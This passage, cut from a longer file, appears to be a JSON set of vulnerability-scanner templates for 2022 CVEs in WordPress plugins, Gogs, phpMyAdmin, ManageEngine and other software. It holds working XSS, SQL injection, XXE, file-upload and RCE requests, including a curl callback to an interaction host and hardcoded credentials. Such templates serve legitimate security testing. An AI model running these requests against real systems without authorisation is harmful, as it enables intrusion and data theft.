name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"regex","regex":["^1331' and sleep\\(5\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-4328\"); ?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fe5df26ce4ca0056ffae8854469c282f"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: 